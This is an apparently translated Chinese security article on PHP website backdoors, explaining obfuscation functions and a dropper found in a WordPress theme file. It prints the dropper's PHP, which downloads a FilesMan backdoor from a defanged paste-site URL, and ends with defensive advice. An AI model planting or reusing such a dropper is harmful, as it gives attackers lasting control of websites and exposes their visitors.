网站后门

后门是攻击者故意留下用于之后访问站点的恶意软件。黑客喜欢在不同的位置注入代码来增加保持对网站控制权的机会，这样就可以继续感染受害者网站了。

今年都在讨论解码含有PHP函数的复杂恶意软件的新方法。常见的PHP函数有：

· eval, 把一段字符串当作PHP语句来执行

· create_function, 主要用来创建匿名函数

· preg_replace, 正则查找替换函数

· assert, 断言函数

· base64_decode.

根据最新的网站被黑报告，过去的一年：

· 被黑的网站中有71%隐藏有基于PHP的后门。

· 这些后门的有效性来源于大多数网站扫描技术的绕过。

不常见的后门

不常见的后门看似合法代码，大多数的恶意软件扫描器都无法扫描到。

在应急响应调查中，研究人员发现一个小的、简单、但有效的后门。

后门的内容会上传到wp-content/themes/buildup/db.php文件，看起来是这样的：

<?php
if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {
echo "Copy_success";
}else{
echo "Copy_failed";
}
?>

这一段代码会从hxxps://paste[.].ee处下载全部的恶意软件。

有一款免费的工具会混淆下载的代码，这样的工具对恶意软件开发者来说是很容易的。研究人员还发现一些合法的代码也会使用这种免费的工具。

混淆的代码从网站下载恶意软件

反混淆后就获得了可读的代码：

从中可以看出这是FilesMan后门的一个副本，FilesMan后门是隐藏在文件系统中的后门，会使其在不访问服务器或日志的情况下很难被发现。

如何避免网站后门？

后门很难发现，也很难去除。首先，研究人员建议经常性的监控日志是否有不常见的行为。其次，为了避免网站被感染，研究人员建议应用文件完整性监控和WAF这样的安全措施。